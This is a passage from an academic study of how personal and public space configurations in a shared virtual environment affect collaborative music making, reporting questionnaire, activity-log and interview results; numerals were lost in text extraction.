and complimented an animation loop, each session lasts min. based on our pilot study and a previous study (men & bryan-kinns, ), we found min was sufficient for the task. to counter-balance the learning effect, all four conditions were experienced in a fully randomised sequence to counterbalance the learning effect. in total four animation loops were introduced to trigger participants’ creativity, each to be played in one experimental session on four virtual screens surrounding the virtual stage. these clips were played in an independently randomised sequence to counterbalance impacts on the study. each session ended with a post-session questionnaire (psq, see table ). after all the four sessions finished, the comparison questionnaire (cq, see table ) and a short interview were carried out at the end of the experiment. results participant reports this section reports on the results of the questionnaires. ratings of post-session questionnaire were refined to counterbalance the learning effect and then analysed with wilcoxon rank sum tests (table ). binomial tests were run to see if the number of ratings for each option was significantly different than would be expected by chance, upper-tail, lower-tail or two-tailed tests were used accordingly, results are listed in table . next, we will present how we counterbalanced the learning effect on psq and then results will be reported following the sub-type of measures. counterbalancing the learning effect as aforementioned, we introduced a fully randomised order of experimental conditions to counterbalance the learning effect. however, it turned out many measurements in the post-session questionnaire were still affected by the sequence to a certain extent, as shown in fig. , in which data from all groups were compiled according to how the group was ordered in the session sequence. wilcoxon rank sum tests were run between each two conditions for every question. a red solid arc indicates a significant difference between two bars (p < . ), and a grey dotted arc indicates a trend toward a significant difference (p < . ). the arcs show that results of four questions (especially psq , psq , psq , psq , psq , psq ) are very sensitive to the sequential position of the session. specifically, in later sessions, participants responded more positively to the helpfulness of the spatial configuration (psq ), higher satisfaction with their output (psq ), and both more, and better quality of contributions by themselves and contributors (psq , psq , psq , psq ). this is probably due to the learning effect which has a much stronger effect on these measures compared with the differences between experimental conditions. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . ra ti n g s ra ti n g s session (s ) session (s ) session (s ) session (s ) wilcoxon rank sum test results p < . p < . psq psq psq psq psq (sense of collaborator’s activity) (amount of contribution) (amount of contribution) (quality of contribution) (quality of contribution) n = psq psq psq psq psq psq (support for creativity) (support for creativity) (prefernce) (sense of collaborator’s presence) (content assessment) (communication quality) s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s figure results of post-session questionnaire (n = ) for all sessions. arcs show significant (solid line) and marginal-significant (dotted line) differences between conditions, indicating possible ordering effects. full-size doi: . /peerjcs. /fig- given the limited experience some participants had in vr and collaborative music making, learning effect could have possibly and greatly promoted participants’ skills and knowledge in performing the task, resulting in a better feeling of the spatial configuration of the session, higher quality of output, more contribution with better quality in later sessions. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. this learning effect has been also mentioned by some participants in the interview. more details will be discussed in the later subsection ‘‘interviews’’. to better counterbalance the learning effect and habituation on psq, only data collected via psq in later two sessions (session and ) will be retained at the expense of the halved sample size. box-plots were then drawn (fig. ) and wilcoxon rank sum tests were run (table ) to compare the conditions against each other. general feeling (helpfulness of spatial configuration, difficulty of cooperation) when asked the condition’s helpfulness for creativity (psq in table ), on a -point likert scale, participants gave an average rating of . in caug, which is significantly higher than . given in cfix (wilcoxon rank sum test, w = , p = . ). there are trends towards significances between participants’ rating of caug and cmov (w = , p = . ), and between cpub and cfix (w = . , p = . ). these differences indicate that caug is better than cfix, and possibly also better than cmov in terms of supporting participants’ creativity. when asked to rate the helpfulness of spatial configurations to support personal idea development (psq ), the mean rating of caug (m = . ) is higher than that of the other three conditions (cpub: m = . ; cfix: m = . ; cmov: m = . ), though no significant differences were found. cq of table shows that cpub was rated by significantly many participants ( out of ) to be the least difficult to cooperate with their collaborator (binomial test, . > . , p = . , -sided), whilst significantly few participants rated cpub as the most difficult one to do so (binomial test, . < . , p = . , -sided). on the opposite, cfix was rated by significantly many participants as the most difficult (binomial test, . > . , p = . , -sided), and significantly few participants ( out of ) rated it as the least difficult (binomial test, . < . , p= . , -sided). preference when asked the level of enjoyment of the spatial configuration (psq ), similar to psq , caug got a higher rating (m = . ). however, no significant difference was revealed. in cq of table , when asked which session has the most enjoyable spatial configuration, out of participants, both caug and cmov were chosen by participants, more than those choosing cpub and cfix ( participants each), though no significant difference was found. when asked which session had the least enjoyable spatial configuration, a significant number of participants ( out of ) opted cfix ( . > . , p = . , -sided), and significantly few ( out of ) opted cmov ( . < . , p = . , -sided). result of cq in table indicates that significantly many participants ( out of ) believed cfix was? the worst setting for creating a good piece of music collaboratively. to summarise, the spatial configuration of cfix is more disfavoured and that of cmov is less disfavoured. sense of co-presence results of psq , psq and cq reveal participants’ sense of collaborators’ presence and activities. cfix’s ratings in psq and psq are significantly lower than cpub and men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . ra ti n g s psq psq psq psq psq psq (support for creativity) (support for creativity) (prefernce) (sense of collaborator’s presence) (content assessment) (communication quality) . . . . ra ti n g s cpub caug cfix cmov wilcoxon rank sum test results psq psq psq psq psq (sense of collaborator’s activity) (amount of contribution) (amount of contribution) (quality of contribution) (quality of contribution) n = cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug cfix cmovcpub caug p < . p < . figure results of post-session questionnaire (n = ), data grouped by experimental conditions. only data collected in the latter two sessions are included. solid arcs show significant differences and dot- ted arcs show marginal-significant differences between conditions. full-size doi: . /peerjcs. /fig- caug (wilcoxon rank sum test, all p < . ), indicating cfix saw a lower sense of the collaborator’s presence and activities. similarly, when being asked in which session they had the strongest sense of collaborators (cq ), significantly many participants ( ) chose cpub ( . > . , p = . e− , -sided), chose caug, significantly few chose cmov men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (chosen by ) and cfix (chosen by ; binomial test, both p < . ; more details in cq of table ). when questions changed to ‘‘least sense of collaborator’s presense’’, ratings reversed, significantly many chose cfix while significantly few chose cpub and caug (binomial test, all p < . ; more details in cq of table ). these results indicate that in terms of maintaining the sense of collaborator’s presence, cpub > caug > cmov > cfix. regarding the sense of collaborator’s activities (psq ), a significantly weaker sense was reported in cfix compared with cpub and caug (wilcoxon rank sum test, both p < . ). cpub also saw a stronger sense compared with cfix (wilcoxon rank sum test, w = . , p < . ). no significant difference was found between cpub and caug nor between cfix and cmov. similarly, cq of the comparison questionnaire reveals that significantly many participants reported tracking collaborators’ activities in cfix was the most difficult, and significantly many felt least difficult to do so in cpub (binomial test, both p < . ). these indicate that cpub seems to be easier for participants to track collaborators’ activities, and cfix is more difficult for them to do so. content assessments participants reported a mean rating . of output quality in cfix (psq of table ), which is significantly lower than . in cpub, and . in cmov (wilcoxon rank sum test, both p < . ), and quasi-significantly lower than . in caug (w = . , p = . ). similarly, significantly many participants reported that they produced the least satisfying piece of music in cfix (binomial test, . > . , p= . , -sided), see cq of table . in other words, cfix tended to led to a music output with lower quality compared with other sessions. communication assessments as listed in psq , communication quality of cfix (m = . ) is significantly lower than . of cpub and . of caug (wilcoxon rank sum test, both p < . ), and near-marginal significantly lower than . of cmov (wilcoxon rank sum test: w = , . ), see psq in table and psq in fig. . when asked to compare these sessions, significantly many participants reported the best communication quality was in cpub and significantly few believed they had the best communication quality in cfix (binomial test, both p < . , see cq of table ). conversely, significantly few had the worst communication quality in cpub and significantly many had worst in cfix (binomial test, both p < . , see cq of table ). in summary, cfix saw a relatively lower communication quality. contribution participants reported that they did a significantly larger amount of contributions in cpub compared with cfix (w = . , p = . ) or with cmov (w = , p = . ), and had done significantly more contribution in caug compared with cfix (w = . , p= . ), see psq . no significant difference was found in cq , which is also questioning the feeling of own contribution. no significant differences were found in the ratings of the amount of the collaborators’ contribution (psq ), except a trend reporting their collaborator had a lower amount of contribution in cfix than cpub and caug (wilcoxon rank sum test, w = . , both p < men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . ). however, cq reveals significantly few participants felt that their collaborator did the most contribution in cmov (binomial test, . < . , p = . , -sided). these results indicate that the addition of personal space in cfix and cmov possibly led to a weaker sense of collaborator’s activities. activity assessments this section reports on measures focusing on the participants’ interactive activities. all measures are listed in table , wilcoxon rank sum tests were run to compare conditions against each other. contribution ( ) note edits (including note additions and deletions). on average, participants did . note edits in cfix, which is significantly more than . of cpub, . of caug, and . of cmov (wilcoxon rank sum test, all p < . ). note additions, as the main part of note edits, follow a similar pattern. the number of note additions in cfix is significantly greater than that of cpub (w = , p = . ), and near-marginal significantly greater than that of caug and cmov (wilcoxon rank sum test, both p < . , check detailed statistics in aa , table ). no significant difference was found in note deletions between conditions, this is probably due to the much smaller amount of deletions compared with the number of note edits and additions. these results indicate that participants had more musical edits, specifically note additions in cfix than the other conditions. ( ) mutual note modifications. cpub saw the highest average number of mutual note modifications (m = . , sd= . ), this is significantly more than cfix (m = . , sd= . ; wilcoxon rank sum test, w = . , p = . ) and cmov (m = . , sd . ; wilcoxon rank sum test, w = . , p = . ). caug has the second highest mean (m = . , sd= . ), which is significantly more than cmov (w = . , p= . ), and near-marginal significantly more than that of cfix (w = . , p = . ). no significant difference between cpub and caug or between cfix and cmov was found. these results indicate participants had more mutual modifications in cpub and caug than cfix and cmov, which might indicate a closer collaboration. ( ) number of note edits that fell into public/personal space. note this measure is only applicable to rigid personal space, which were only available in cfix and cmov. participants did . (sd = . ) note edits in public space, . (sd = . ) note edits inside personal space in cfix, these numbers reduced to . (sd = . ) in public space and (sd = . ) inside personal space when it comes to cmov. although both numbers decreased, no significant differences were found between conditions. location and territory to illustrate how participants used the space, based on the system-logged data, we plotted the positions and directions of participants’ heads and musical note edits on a top view of the stage, see fig. as an illustrative example of visual traces from arbitrarily selected group . visual traces of all groups are shown in fig. . these figures were made based on system logged data, specifically, the arrows were participants’ locations at -second intervals for ease of reading the diagram, and dots are the locations of participants’ hands men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table statistics and wilcoxon rank sum test (two-tailed) of activity assessments (aa). measure cpub caug cfix cmov cpub vs caug cpub vs cfix cpub vs cmov caug vs cfix caug vs cmov cfix vs cmov m (sd) m (sd) m (sd) m (sd) p (w) p (w) p (w) p (w) p (w) p (w) aa —no. of note edits . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) . ( . ) . ( ) aa —no. of note additions . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) aa —no. of note deletions . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( . ) . ( . ) aa —no. of mutual note modifications a . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) aa —size of group territory (unit: m ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( . ) aa —size of personal territory (unit: m ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . e− ( ) . ( ) . e− ( ) . ( ) . e− ( ) aa —no. of group edits (note edits done in group territory) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . e− ( ) . ( . ) . ( ) aa —no. of personal edits (note edits done in own personal territory) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . e− ( ) . ( ) . e− ( ) . ( . ) . ( ) aa —no. of note edits done in other’s personal territory . ( . ) ( ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) . ( ) . ( ) aa —average distance between collaborators (unit: metre) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . e− ( ) . ( ) . e− ( ) . ( ) . e− ( ) aa —no. of uses of personal spaces - (-) - (-) . ( . ) . ( . ) - (-) - (-) - (-) - (-) - (-) . ( ) (continued on next page) m en etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) measure cpub caug cfix cmov cpub vs caug cpub vs cfix cpub vs cmov caug vs cfix caug vs cmov cfix vs cmov m (sd) m (sd) m (sd) m (sd) p (w) p (w) p (w) p (w) p (w) p (w) aa —length of time of using personal spaces (unit: second) - (-) - (-) . ( . ) . ( . ) - (-) - (-) - (-) - (-) - (-) . ( ) aa —average duration of each entry of personal space (unit: second) b - (-) - (-) . ( . ) . ( . ) - (-) - (-) - (-) - (-) - (-) . ( ) aa —no. of note edits in public space - (-) - (-) . ( . ) . ( . ) - (-) - (-) - (-) - (-) - (-) . ( ) aa —no. of note edits in personal space - (-) - (-) . ( . ) ( . ) - (-) - (-) - (-) - (-) - (-) . ( . ) aa —time spent paying close attention to collaborator (unit: second) c . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( . ) . ( ) . ( ) aa —times of paying close attention to collaborator c . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) aa —time spent paying ordinary attention to collaborator (unit: second) c . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) aa —times of paying ordinary attention to collaborator c . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( . ) . ( . ) . ( ) aa —no. of music interface additions x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) aa —no. of music interface additions in public space - (-) - (-) x (x) x (x) - (-) - (-) - (-) - (-) - (-) x (x) aa —no. of music interface additions in personal space - (-) - (-) x (x) x (x) - (-) - (-) - (-) - (-) - (-) x (x) notes. amutual note modifications include activation/deactivation, the last update of which was performed by the collaborator. bdata of four participants ( b, a, b a) were excluded when calculating this metric as these participants did not use personal space, which made this metric not apply to them. cthe difference between the close attention and the ordinary attention is the breadth and depth of fov, fov of close attention roughly covers degrees (horizontally), degrees (vertically) and m (depth), whilst fov of ordinary attention roughly covers degrees (horizontally), degrees (vertically) and . m (depth). m en etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustrative example of visual traces of the participants’ locations, directions and musical note edits (group ). arrows show participant’s position and direction at s intervals, dots show partici- pant’s hand’s position while performing note edits. full-size doi: . /peerjcs. /fig- when making musical note edits. research of table-top collaboration defines personal territory as a workspace close to the person and group territory as the central area or spaces between collaborators (xambó et al., ; scott, carpendale & inkpen, ; scott & carpendale, ). following this definition, we dye the area within a . -metre radius of the participants’ locations (locations here are at -second interval for higher accuracy) with different tint colours (red for participant a’s personal territory, and blue for b’s) to indicate territories. we chose . metres as it falls into the range of close phase of personal distance, and permits participants to touch each other or the same music interface (hall, ), most of the musical note edits also fell inside this range. ( ) distribution of locations and interactions. the more intensely blue or red the area is, the more presence the corresponding participant had shown in that location. the overlap is coloured grey, indicating the appearance of both participants, which can be seen as group territory. ( ) sizes of group territory and group edits (edits undertaken in group territory). by calculating the size of red/blue/grey area, the size of personal/group territory can be calculated. specifically, participants formed an average of . m of group territory in cpub, . m in caug, . m in cfix and . m in cmov (aa of table ). results of the wilcoxon rank sum tests show that the size of group territory of caug is significantly larger than that of cfix (w = , p = . ), and near-marginal significantly larger than cmov (w = , p= . ). no significant difference was found between cpub and caug. aa of table shows that participants had an average of . group edits in cpub, which is significantly more than . of cfix (wilcoxon rank sum test, w = , p = . ), and a near-marginal significantly more than . of cmov (w = . , p = . ). caug resulted in a higher average of group edits (m = . ), though not significantly higher than cpub, it is significantly higher than numbers of cfix and cmov (wilcoxon rank sum test, both p < . ). these indicate the spatial configurations of cpub and caug are more friendly to group edits. ( ) sizes of personal territory (aa of table ) and personal edits (edits fallen into personal territory; aa ). participants formed a significantly larger personal territory in cfix men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure visual traces—the participants’ locations, directions and musical note edits shown on a top view of the stage (based on system-logged data of all groups). full-size doi: . /peerjcs. /fig- men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (m = . m , sd = . ) compared with all the other three conditions (wilcoxon rank sum test, all p < . ), and had significantly more personal edits in cfix compared with other conditions (wilcoxon rank sum test, all p < . ; aa ). similarly, a larger size of personal territory was formed in cmov and more personal edits were done in cmov compared with cpub and caug (all p < . ). no significant differences were found between cpub and caug, neither in the size of personal territory nor in the number personal edits. to summarise, cfix results in the largest size of personal territory and the largest number of personal edits, the metrics of cmov follows, and cpub and caug have the least, indicating that cfix led to a much looser collaboration, in which participants worked more independently, whilst cpub and caug, on the opposite, led to more interactivities in the group territory. ( ) average distance (aa of table ). participants had an average distance of . metres between themselves and their collaborators in cfix, this is significantly bigger than other three conditions (wilcoxon rank sum test, all p < . ). namely, in the other three sessions participants worked more closely. times and amount of use of personal space as shown in aa , aa and aa of table , in cfix, participants had an average of . entries of personal space on average, with each entry lasting . s with total duration . s. for cmov, the participants did . entries, each lasting . s on average, with a total usage time of . s, no significant difference was found in the number of entries or in the sum usage time. however, the average duration of each entry of cmov is significantly shorter than that of cfix (wilcoxon rank sum test, w = , p = . ), indicating that the personal spaces of cfix were possibly more used for longer, independent creation. attention ( ) the time participants spent paying close attention to each other - throughout the -second session, participants had their close attention toward their collaborators’ heads for . s in caug, which is significantly longer than . s in cpub, and . s in cfix (wilcoxon rank sum test, both p < . ), and near-marginal significantly longer than . s in cmov (w = , p = . , see aa in table ). ( ) participants oriented their close attention toward their collaborator for significantly different times, they did most of the time in caug (m = . ), this is significantly more than . in cpub, . in cfix and . in cmov (wilcoxon rank sum test, cpub vs caug: w = . , p= . ; caug vs fix: w = , p= . ; caug vs cmov: w = . , p = . ). wilcoxon rank sum test result also shows participants paid their attention to their partner significantly fewer times in cfix than they did in cmov (w = , p = . ), see aa in table . these results indicate the spatial configuration in caug significantly promoted participants to pay more close attention to their collaborator, whilst cmov possibly promoted insignificantly and cfix demoted insignificantly compared with cpub. ( ) the time participants spent paying ordinary attention to each other. different from the impact of spatial configurations on close attention, neither caug nor cmov significantly changed the way participants paying their ordinary attention, all fell inside the range from to s out of the -second session. cfix greatly reduced participant’s ordinary men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. attention paid to each other, on average participants only spent . s on doing this, which is significantly shorter than cpub and caug (wilcoxon rank sum test, both p < . ) and near-marginal significantly shorter than cmov (wilcoxon rank sum test, w = , p = . ), more details are shown in aa of table . ( ) similar to the time paying ordinary attention to each other, participants only drew an average of . times of ordinary attention to each other in cfix, which is significantly lower than all the other three conditions (wilcoxon rank sum test, all p < . ), check detailed statistics in aa of table ), indicating the spatial configuration of cfix greatly reduced participants’ paying ordinary attention to each other. interviews post-task interviews with participants revealed more reflective insights into the spatial configurations. around , words of transcription were transcribed and a thematic analysis of the transcription was undertaken. for more information about the thematic analysis, see (braun & clarke, ; yin, ). the starting point of the thematic analysis was a reading through of the transcripts, then we did an inductive analysis of the data, collapsing relevant patterns into codes. next, these codes were combined into overarching themes, which were then reviewed and adjusted until they fit codes well. as shown in fig. , in total, coded segments, codes and overarching themes emerged from the thematic analysis: learning effects members of groups mentioned the effect of the session sequence. specifically, coded segments contributed by participants were related to learning effects. participants reported the sequence is an ‘‘important factor’’ (participant a, hereafter abbreviated to p a). the first session was felt to be hard as they were ‘‘just being introduced to [the system and they were] still adjusting’’ to it (p a), trying to ‘‘[figure] out how the system was working’’ (p a). when they ‘‘were progressing into latter sessions, [they] felt easier to communicate and use gestures to manipulate the sound, being able to collaborate more, more used to the system’’ (p b), these changes led to a higher level of satisfaction and more enjoyment in later conditions. it should also be noted that interestingly p a and p b reported the sequence effect adversely, they enjoyed the first session more because ‘‘the first one was an element of surprise, a total surprise’’ as that was ‘‘the first time they were using the system’’. that feeling of freshness made that session more exploratory and more joyful to them. these learning effects might possibly affect the results of post-session questionnaire and comparison questionnaire and thus should be well counter-balanced. reporting the spatial configurations ( ) cpub - simple but can be chaotic. since there is no personal space, participants could, and had to hear all the interfaces all the time. in total, coded-segments are about the disadvantage of this setting, some examples are: ‘‘a bit troubling’’ (p b), ‘‘music [was] always very loud’’ (p a), ‘‘it was global music, and there was someone annoying’’ (p a), ‘‘[they were] not going to say anything’’ about disagreement because that could possibly make them appear to be ‘‘rude’’ (p a). it was easier if there is something helpful ‘‘to perceive men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. n o of c od ed s eg m en ts le ar ni ng ef fe ct cp ub ca ug cf ix cm ov cp ub ca ug cf ix cm ov cp ub ca ug cf ix cm ov cp ub ca ug cf ix cm ov cp ub ca ug cf ix cm ov ad va nt ag es of sy st em di sa dv an ta ge s of sy st em su gg es tio ns ot he r most favourite second favourite most unfavourite condition advantages of the condition disadvantages of the condition reporting the spatial configurations reporting lemo system reporting learning effect figure ingredients of all the coded-segments of the interview, numbers of coded segments are shown along the bars. . full-size doi: . /peerjcs. /fig- what [they were] doing, and not get confused with what [their collaborator] was doing’’ (p b), it was too ‘‘chaotic’’ (p a), ‘‘too confusing’’ (p a) & p b), ‘‘annoying’’ (p b). they ‘‘cannot concentrate’’ (p b), ‘‘everything [was] open and quite noisy’’ (p b), they didn’t ‘‘have the tranquillity to operating [the] sounds...everything [came] mixed, which [was] difficult to manage’’ (p a). there were coded segments from participants reporting the positive side of the cpub, some examples are: (i) pieces created in ‘‘personal space’’ might clash in a music way (p a), ‘‘better to work when knowing how it sounds all together’’ (p b), music pieces might match better; (ii) better for providing help to the other, according to p a, they needed someone to lead them and thus the ability to hear all the work all the time was helpful; (iii) ‘‘space wise’’, namely, no space limitation, compared with having to work closer to ‘‘hear the sound well’’ (p a), cpub does not have this constraint, they could choose to work ‘‘anywhere’’ (p a); (iv) ‘‘easier’’ to understand the condition (p b), fewer confusions when simply being able to hear all the things all the time (p a); (v) ‘‘collaborative wise’’ (p a), less separation, better collaboration compared conditions where ‘‘personal space’’ was provided (p b, p a and p b). men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ) cpub - simple but can be chaotic. there were coded segments contributed by participants favouring condition caug, higher than segments contributed by participants for cpub, segments contributed by eight participants for cfix, and segments contributed by participants for cmov (the sum of number of contributors here is greater than as a few participants reported more than one favourite condition in the interview). the reason for the popularity can be concluded from the overwhelming coded segments from participants from groups reporting the advantages of this condition, much higher than the number of segments reporting other conditions’ advantages. caug’s advantages reported by participants can be grouped into four groups: (i) higher team cohesion and less sense of separation. participants reported that without the rigid personal space, they had to ‘‘work with the other person’’ (p a). with no rigid personal space, caug ‘‘forced [them] to collaborate more...because [they] had to stay very close’’ to compose music (p b). (ii) an appropriate environment for creativity, more consistency and convenience. as described by participants, it was ‘‘a middle point between personal space and no personal space’’ (p a), without even triggering something, ‘‘[they] could decide in a continuous way’’, ‘‘whether [they] were able to listen to the other sound sources or not, [and] to what extent [they] wanted to isolate [themselves]’’ (p a). compared with having to hear all sounds in cpub, this provided them with a ‘‘less stressing’’ (p a) context, and they could selectively move away to avoid ‘‘getting interrupted with the other’’ (p b) and overlapping music. compared with cfix and cmov, being able to still ‘‘hear a bit of it in the background but not completely’’ (p a) was reported good as this kept them ‘‘up to date’’ (p a) and helped them to ‘‘tailor what [he/she] was making’’ (p b) to match the co-created music and to make something new and see if it ‘‘fit with’’ (p a) the old. caug provided them with ‘‘a little bit of personal space’’ although not a quite ‘‘defined thing’’ (p a), which provided the possibility ‘‘to work on something individually’’ and to ‘‘share work quite easily’’ (p a). (iii) easier to identify sounds. participants reported it was easier to ‘‘locate the source of the sound’’ (p a) and ‘‘perceive what (they were) doing’’ (p b), these factors then helped them ‘‘understand instruments better’’ (p b) and ‘‘not get confused’’ (p b); (iv) more real. quite interestingly, instead of cpub, which simulates the acoustic attenuation in the real world, caug was reported to be similar to the experience in the real world. participants reported in caug ‘‘if [they] want to hear something, [they] just come closer, like in the real world’’ (p b & p b), ‘‘feeling like the real-time experience (p b)’’. it should also be noted that, along with these coded segments reporting the advantages provided by caug, there are segments reporting its limitations. these limitations fall into three groups: (i) a preference ‘‘to hear all the instruments all the time’’ in cpub (p b), (ii) caug might lead to ‘‘another type of compositions’’ and ‘‘influence the piece’’ (p b), and (iii) not being able to hear all sounds led to a feeling of separation (p a). ( ) cfix and cmov - resemblance and differences. regardless of the mobility, the personal space provided by cfix and cmov share the same characteristics. not surprisingly, the participants reported many common advantages and disadvantages shared by both conditions, including: the addition of rigid personal space was described as an ‘‘added advantage’’ (p a), it made it ‘‘easier to perceive what [they were] doing and not get confused men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with what [their collaborator] was doing’’ (p b), provided them with a chance to ‘‘isolate themselves to create their piece’’ (p a), and to ‘‘think about something to add’’ (p a), helped them to ‘‘develop their own ideas’’ (p a). as a result, they used personal space ‘‘a lot [and] used [their] own creativity much more comparing with [other two sessions]’’ (p a & p b). common disadvantages reported include: the rigid form led to segmentation, and a feeling of being ‘‘forc[ed]’’ to work on something individually (p a), making them ‘‘forget’’ the collaboration and collaborator (p a & p a), resulting in less collaboration, less ‘‘communication happening’’ (p a), ‘‘lost the idea of the joint music piece’’ (p a & p b), and as a possible result, each other’s music pieces did not fit when brought up (p a). p a reported they were not familiar with music, and thus they ‘‘needed somebody to lead’’ them, so preferred to hear sounds all the time. besides, p b reported that the visual personal space made the stages look ‘‘messy’’. differences between cfix and cmov—in total, coded segments (from participants) were reporting cmov’s advantages and segments (from participants) reporting its disadvantages, compared with segments (from participants) and segments (from participants) for cfix, indicating in general participants thought cmov better than cfix. some example insights behind the preference are: cmov functioned like a ‘‘mute button’’ (p b), which could be used anywhere (p b), enabling them to ‘‘move around’’, work ‘‘closer...and see each other’s things’’ and thus led to ‘‘more collaboration’’ between them (p b). though cfix had no advantages on these aspects, the location at the opposite corners provided a more ‘‘personal feeling’’ and a higher sense of belonging (p a & p b). walking to the corner to access personal space was not a big issue for p b & p a as ‘‘the boundary is small’’. besides, the relatively far distance also helped to ‘‘prevent [them] from clashing’’ (p a). discussion the key question that this paper tries to address is how shared virtual environments should be designed to support creative collaboration. to help answer this question, a better understanding of the role of personal and public space is needed given that previous research has highlighted the necessity of providing personal space with fluid transition to public space during collaboration (scott, carpendale & inkpen, ; shen, everitt & ryall, ; sugimoto, hosoi & hashizume, ) and also that people do form public and personal space in collaboration in ves (men & bryan-kinns, ). next, based on the results, we will discuss (i) the necessity and (ii) the impacts of adding each type of personal space, then make comparisons between (iii) conditions providing personal space with and without mobility, and iv) conditions providing personal space with rigid and fluid boundary. necessity of adding personal space when no personal space was available, cpub was reported to provide the experience of the least difficulty for tracking the collaborator (cq in table ), the strongest sense of collaborator (cq ), best communication quality (cq ), the least difficulty to men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cooperate (cq ). so cpub seems to be the simplest one among these four configurations for participants to learn and get used to. however, the issues of having no personal space are clear. firstly, especially for the music making task in this study, according to the interview results, participants reported that the background could be messy to develop own ideas, their creativity requires a quieter and more controllable environment. considering individual creativity forms an important part of the collaborative creativity, providing an appropriate environment is crucial. the personal space provided in caug, cfix, and cmov functioned like a ‘‘less stressing’’ context, within which, participants could better ‘‘understand instruments’’ and not ‘‘get confused’’. secondly, participants need an opportunity to develop their own ideas. from the interview results, having personal space was reported to be ‘‘an added advantage’’, it helped to promote their own creativity, which was then combined and contributed to the joint piece. this echoes the findings in men & bryan-kinns, ( ), that providing personal spaces is helpful as it provides a chance to explore individual ideas freely, which then added an interesting dynamic to the collaborative work. though some disadvantages of having personal space were also reported, e.g., less communication, higher isolation and being messy, most of these limitations were possibly the result of introducing rigid visible personal space, and caug was founded to have addressed these limitations well (details will be discussed in later subsections). next, we discuss the impacts of introducing each of these personal spaces individually by comparing their condition with cpub. impacts of adding personal space as mentioned above, the previous study (men & bryan-kinns, ) found that the addition of personal space located at the opposite side of the public space led to a shrunken size of group territory, fewer group note edits, a larger size of personal territory, more personal note edits, a larger average distance between collaborators, and fewer times of paying attention to collaborators. we argued these negative impacts are mainly due to, in that study, the personal spaces being distributed on the opposite side of the group space resulted in a larger distance between participants. so we proposed personal space with different features (e.g., gradual boundary in caug, mobility in cmov) might reduce, or even minimise, these negative effects. next, the impacts of introducing newly-featured personal spaces in caug, cfix, cmov, and how these negative effects might be eliminated or minimised will be discussed. invisible auditory personal space in caug caug is quite similar to cpub in many ways, e.g., both do not have a visual boundary for personalspaces, no visualtriggers forpersonalspace, similar territorialpatterns wereformed in these two conditions (fig. ). not surprisingly, no significant differences were found in most of the statistical measures listed in tables and . the only differences revealed in these two tables are the significant differences found in aa , aa —significantly more occurrences and longer duration of close attention were paid to collaborator in caug, and a marginal-significant difference in psq —sense of collaborator’s activity is higher in cpub than in caug. from another perspective, fewer differences between cpub and caug men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. indicate that the limitations of adding personal space identified in previous work (men & bryan-kinns, ) have been successfully minimised. specifically, the size of group territory and the number of group edits maintained similar numbers, the means of caug are even greater, though not significantly (aa and aa in table ). cpub and caug saw a similar size of personal territory and personal edits, and similar average distance (respectively, aa , aa , aa in table ), and caug even saw more close-attention paid to each other (aa and aa in table ). all these similarities indicate that by introducing a personal space with gradual and invisible boundary, these identified disadvantages of introducing personal space have been successfully eliminated. reasons can be that caug managed to provide a similar interaction experience to cpub. in the previous study (men & bryan-kinns, ), to access the personal spaces located at the opposite side of the public space, participants had to drift apart, which might have 